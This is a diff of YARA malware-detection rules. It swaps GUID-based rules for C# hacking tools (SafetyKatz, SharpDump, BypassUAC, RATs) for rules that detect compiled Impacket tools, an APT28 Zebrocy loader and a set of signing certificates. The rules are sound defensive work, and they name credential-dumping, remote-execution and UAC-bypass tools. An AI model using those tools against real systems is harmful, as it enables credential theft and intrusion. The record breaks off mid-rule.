+		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
+		logic_hash = "68c3f2c97a8eab3d334222eae4c4b808e6b763896f198d033f4d11218e9ff551"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$typelibguid0lo = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii wide
-		$typelibguid0up = "8FE5B811-A2CB-417F-AF93-6A3CF6650AF1" ascii wide
+		$cert1 = "91210242MA0YGH36" wide ascii
+		$cert2 = "Copyright (C) 2013-2021 QuickZip. All rights reserved." wide ascii
+		$cert3 = "Qi Lijun" wide ascii
+		$cert4 = {51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
+		$cert5 = "Luck Bigger Technology Co., Ltd" wide ascii
+		$cert6 = {4c 00 75 00 63 00 6b 00 20 00 42 00 69 00 67 00 67 00 65 00 72 00 20 00 54 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 79 00 20 00 43 00 6f 00 2e 00 2c 00 20 00 4c 00 74 00 64 }
+		$cert7 = "XinSing Network Service Co., Ltd" wide ascii
+		$cert8 = "Hangzhou Shunwang Technology Co.,Ltd" wide ascii
+		$cert9 = "Zhuhai liancheng Technology Co., Ltd." wide ascii
+		$cert10 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert11 = { e5 8c 97 e4 ba ac e5 bc 98 e9 81 93 e9 95 bf e5 85 b4 e5 9b bd e9 99 85 e8 b4 b8 e6 98 93 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert12 = { e7 a6 8f e5 bb ba e5 a5 a5 e5 88 9b e4 ba 92 e5 a8 b1 e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert13 = { e5 8e a6 e9 97 a8 e6 81 92 e4 bf a1 e5 8d 93 e8 b6 8a e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 0a }
+		$cert14 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and any of ( $cert* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Safetykatz : FILE
+rule SIGNATURE_BASE_Apt28_Win_Zebrocy_Golang_Loader_Modified : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f6d7432-0bb5-5782-98ec-2c2168f2fc1f"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/SafetyKatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1072-L1086"
+		description = "Detects unpacked modified APT28/Sofacy Zebrocy Golang."
+		author = "@VK_Intel"
+		id = "cce9ba6c-954c-5b13-a058-cdf7895d63fc"
+		date = "2018-12-25"
+		modified = "2023-12-05"
+		reference = "https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_zebrocy.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3de5223d6cbd3af386210531506b270d94a5b89d7e3582e248571e31d3c191d8"
+		logic_hash = "799f4457eb2bdeeb7c9383e2b4e9572a41d9adbfe4a1a9c3b0fa1c9fc6077e40"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii wide
-		$typelibguid0up = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii wide
+		$go = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 }
+		$init = { 6d 61 69 6e 2e 69 6e 69 74 }
+		$main = "main" ascii wide fullword
+		$scr_git = {67 69 74 68 75 62 2e 63 6f 6d 2f 6b 62 69 6e 61}
+		$s0 = "os/exec.(*Cmd).Run" fullword ascii
+		$s1 = "net/http.(*http2clientConnReadLoop).processHeaders" fullword ascii
+		$s2 = "os.MkdirAll" fullword ascii
+		$s3 = "os.Getenv" fullword ascii
+		$s4 = "os.Create" fullword ascii
+		$s5 = "io/ioutil.WriteFile" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $go and $init and all of ( $s* ) and #main > 10 and #scr_git > 5
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dropless_Malware : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Wmiexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0da3b6d8-2002-590e-a8d5-f6c84acfb083"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Dropless-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1088-L1102"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c2c7edf-da71-53dc-9ddf-dfbf10838a27"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "832d175372c322cd488594be558819375fb9f9f100ff0cbb880231c9fc7138f7"
+		logic_hash = "1ac78768ae230aa00f392f7a7886589b14814e9c7379528d2ecd218852086ee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
 
 	strings:
-		$typelibguid0lo = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii wide
-		$typelibguid0up = "23B739F7-2355-491E-A7CD-A8485D39D6D6" ascii wide
+		$s1 = "bwmiexec.exe.manifest" fullword ascii
+		$s2 = "swmiexec" fullword ascii
+		$s3 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Silentclean : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Sniffer : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2dde9632-10c5-5c91-8bd9-2fb80d6f0c49"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/EncodeGroup/UAC-SilentClean"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1104-L1118"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L49-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2e624d84a6d47c99b28ef41918f1d88cb219a90d35691d0cce8fe10a0a237650"
+		logic_hash = "77f4a7cdfced27ea342fe0fe6debebb720b7494b3f352465ab2fd92f2b7178ab"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
 
 	strings:
-		$typelibguid0lo = "948152a4-a4a1-4260-a224-204255bfee72" ascii wide
-		$typelibguid0up = "948152A4-A4A1-4260-A224-204255BFEE72" ascii wide
+		$s1 = "ssniffer" fullword ascii
+		$s2 = "impacket.dhcp(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Desktopgrabber : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Mmcexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7db07291-d6d4-5527-a879-27f899dbd6fe"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/DesktopGrabber"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1120-L1134"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cca2082f-72a4-50c8-80b8-a9bed430dc4e"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L65-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "150a2f89eee5e5e0fa77c42b004e170d8706db69e02293f297376933ec03d1be"
+		logic_hash = "1aee75155ed3d868f576d7d650f0791ac54e351851f7bfb65390b4ae5c4c83b9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "263a1655a94b7920531e123a8c9737428f2988bf58156c62408e192d4b2a63fc"
 
 	strings:
-		$typelibguid0lo = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii wide
-		$typelibguid0up = "E6AA0CD5-9537-47A0-8C85-1FBE284A4380" ascii wide
+		$s1 = "smmcexec" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 16000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wsmanager : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Ifmap : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b8c330dc-74aa-5a33-8af6-17c9beb8be81"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/guillaC/wsManager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1136-L1150"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5461916-ec2b-5f65-b938-267483f50bb2"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L81-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f335250f717cdcc2e9c6022a1fc22a61b4eec59a5c69c9359c2f7658081117b3"
+		logic_hash = "bbe875e03434c040da914e81ec5ef691ba8fd02607631e118d958819d0e94ff5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "20a1f11788e6cc98a76dca2db4691963c054fc12a4d608ac41739b98f84b3613"
 
 	strings:
-		$typelibguid0lo = "9480809e-5472-44f3-b076-dcdf7379e766" ascii wide
-		$typelibguid0up = "9480809E-5472-44F3-B076-DCDF7379E766" ascii wide
+		$s1 = "bifmap.exe.manifest" fullword ascii
+		$s2 = "impacket.dcerpc.v5.epm(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Uglyexe : FILE
+rule SIGNATURE_BASE_Karmasmb : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5833e6c5-f078-5eb5-9519-76710d7da0e1"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/fashionproof/UglyEXe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1152-L1166"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "32c810c7-02e7-5203-b2ed-4e930b318cc0"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L97-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7f3e5ef8fc7d6994c1ebab8fc35624691d8f200acf6068b0948fd818f8ad2223"
+		logic_hash = "94322dda799bcb25caeb7f9e526bcc14c6dfd9247080b4bb79dcd7b340fcb36c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
 
 	strings:
-		$typelibguid0lo = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii wide
-		$typelibguid0up = "233DE44B-4EC1-475D-A7D6-16DA48D6FC8D" ascii wide
+		$s1 = "bkarmaSMB.exe.manifest" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdump : FILE
+rule SIGNATURE_BASE_Samrdump : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b613092f-9006-5405-b07e-59737410ac1e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/SharpDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1168-L1182"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd274719-c8cc-5882-8d75-192ad822c6b3"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L112-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "65e28a356cc975a3014f59551035a324d21039e39a8596b5980ad0c0e4d0a811"
+		logic_hash = "6bc0a4d9f9bd0d72e7f2ce4b0f8608296e6f2db14fd3a1740e0eebfe35629018"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
 
 	strings:
-		$typelibguid0lo = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii wide
-		$typelibguid0up = "79C9BBA3-A0EA-431C-866C-77004802D8A0" ascii wide
+		$s2 = "bsamrdump.exe.manifest" fullword ascii
+		$s3 = "ssamrdump" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Educationalrat : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Rpcdump : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1d54bea-a6c4-5c57-9ee1-7438d503b01d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/securesean/EducationalRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1184-L1198"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f998aa6-c260-5fef-99ef-e8b4770c68c6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L128-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad6baa993ba3da60233da39ec55b10ab0fe3b2ca52882972b54c7d199e7b6abb"
+		logic_hash = "cf0a64391ef0a5d3f87996fb3e4f152a3ff4938356b96f840aa3f4f4f30aaa97"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
 
 	strings:
-		$typelibguid0lo = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii wide
-		$typelibguid0up = "8A18FBCF-8CAC-482D-8AB7-08A44F0E278E" ascii wide
+		$s1 = "srpcdump" fullword ascii
+		$s2 = "impacket.dcerpc.v5.epm(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stealth_Kid_RAT : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Secretsdump : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f26e040a-dcc7-518f-89f2-3333f83fa14a"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/ctsecurity/Stealth-Kid-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1200-L1216"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c944d051-ea24-5595-abef-59e326ad56de"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L144-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c251c306f416d7a3192d7a11d87b99ab62e2d32453ddecb75a3c517f24a0342"
+		logic_hash = "462748d60764c6fbaeede48b5a98cb68f61cf695f976bf6db94cb497be48fcb2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
 
 	strings:
-		$typelibguid0lo = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii wide
-		$typelibguid0up = "BF43CD33-C259-4711-8A0E-1A5C6C13811D" ascii wide
-		$typelibguid1lo = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii wide
-		$typelibguid1up = "E5B9DF9B-A9E4-4754-8731-EFC4E2667D88" ascii wide
+		$s1 = "ssecretsdump" fullword ascii
+		$s2 = "impacket.ese(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcradle : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Esentutl : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e2123a73-2609-559d-a122-923ebf8fd668"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/anthemtotheego/SharpCradle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1218-L1232"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1965e2b3-54be-553a-83d6-a0d4919414dd"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L160-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a56c456a7c4f61b65f603bc2c8449668a90e36f8b240bca8ea474d82e8174c78"
+		logic_hash = "e972ad610df65309f4e5996ad0b537670b944f43b810fda5a890ea995193a97a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "70d854953d3ebb2c252783a4a103ba0e596d6ab447f238af777fb37d2b64c0cd"
 
 	strings:
-		$typelibguid0lo = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii wide
-		$typelibguid0up = "F70D2B71-4AAE-4B24-9DAE-55BC819C78BB" ascii wide
+		$s1 = "impacket.ese(" ascii
+		$s2 = "sesentutl" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Bypassuac : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Opdump : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "327f581e-1d8c-5d20-bdd7-a29810c619c9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/cnsimo/BypassUAC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1234-L1250"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1bb0e747-e9b7-5a54-8052-428351be8d0d"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L176-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e466c4e3da0e8bc98eac148c67831df639befab716e0da5c779e3caacbf349a8"
+		logic_hash = "18b772e19fd61d77f3a671ee097e0f032738a73a360f4cfe79df4eb6377e12b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
 
 	strings:
-		$typelibguid0lo = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii wide
-		$typelibguid0up = "4E7C140D-BCC4-4B15-8C11-ADB4E54CC39A" ascii wide
-		$typelibguid1lo = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii wide
-		$typelibguid1up = "CEC553A7-1370-4BBC-9AAE-B2F5DBDE32B0" ascii wide
+		$s2 = "bopdump.exe.manifest" fullword ascii
+		$s3 = "sopdump" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hanzoinjection : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Sniff : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c432bf68-49bf-57c7-bbfa-7bd2f3506c52"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/P0cL4bs/hanzoInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1252-L1266"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L192-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aec8befc497505ea750ce0cfc1e0b1ef21b5a6b97660f5403d6612629edaa114"
+		logic_hash = "b317e23d1f76cec4d5b14cb95d463ec410551052b30f1d2d5f52a441104108c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
 
 	strings:
-		$typelibguid0lo = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii wide
-		$typelibguid0up = "32E22E25-B033-4D98-A0B3-3D2C3850F06C" ascii wide
+		$s1 = "ssniff" fullword ascii
+		$s2 = "impacket.eap(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Clr_Meterpreter : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1d8a9717-4d80-5fb1-9c57-9b5f6c5a18b0"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/OJ/clr-meterpreter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1268-L1292"
+		description = "Compiled Impacket Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "02208817-2eab-54e2-90cf-44dbf5474607"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L208-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "15fb4e51fc1473fbee3b08c2a94b6a984cc5b9c92c8aab5641f161aef8b5f01b"
